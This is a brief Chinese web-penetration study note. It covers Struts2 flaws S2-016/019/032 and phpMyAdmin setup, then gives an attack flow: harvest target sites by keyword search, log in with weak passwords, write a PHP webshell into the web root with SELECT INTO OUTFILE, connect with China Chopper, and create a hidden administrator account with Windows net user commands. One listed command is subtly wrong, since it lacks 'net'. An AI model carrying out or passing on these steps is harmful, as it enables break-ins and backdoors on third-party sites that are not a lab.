Web渗透学习（一）

什么是struts2?

Struts2是一个基于MVC设计模式的Web应用框架，它本质上相当于一个servlet，在MVC设计模式中，Struts2作为控制器(Controller)来建立模型与视图的数据交互。其被普遍应用于阿里、京东等各大网站。

本次讲的struts2漏洞是什么？

• S2-016
• S2-019
• S2-032

什么是phpMyAdmin？

phpMyAdmin 是一个以PHP为基础，以Web-Base方式架构在网站主机上的MySQL的数据库管理工具，让管理者可用Web接口管理MySQL数据库。

如何使用phpMyAdmin？

• 下载phpMyAdmin，这是官网连接
• 解压并备份
• 找到config.sample.inc.php，改名为config.inc.php，用文本编辑器打开该文件，找到下列代码：

$cfg['blowfish_secret'] = ''

改为

$cfg['blowfish_secret'] = 'c4ca4238a0b923820dcc509a6f75849b';//一个长字符串密码就行

• 进入apache的conf文件夹下，新建一个phpmyadmin.conf文件，文本编辑器打开，加入下列代码：

Alias /phpmyadmin "c:/phpMyAdmin/"

Options Indexes FollowSymLinks MultiViews
AllowOverride all
Require all granted
php_admin_value upload_max_filesize 128M
php_admin_value post_max_size 128M
php_admin_value max_execution_time 360
php_admin_value max_input_time 360

• 在该文件夹内找到配置文件httdp.conf，用文本编辑器打开，在末尾增加一行

Include conf/phpmyadmin.conf

本次讲的phpMyAdmin漏洞是什么？

通过phpMyAdmin弱口令拿shell

本次使用的工具或方法是什么？

• 工具：struts2漏洞利用工具、听潮URL采集工具
• 方法：关键词搜索（UPUPW）、弱口令、

本次使用了哪些命令？其作用是什么？

命令	代码
查看用户	net user
新建用户	net user 123 123 /add
提权	localgroup administrators 123 /add
删除用户	net user 123 /del
查看IP	ipconfig
查看端口	netstat -abn

整理本次的攻击流程

• 利用弱口令进入phpMyAdmin后台
• 在sql中输入以下语句

SELECT ''
INTO OUTFILE 'D://upupw//htdocs//xk.php'

• 利用菜刀连接
• 后续可利用小马或者大马完成渗透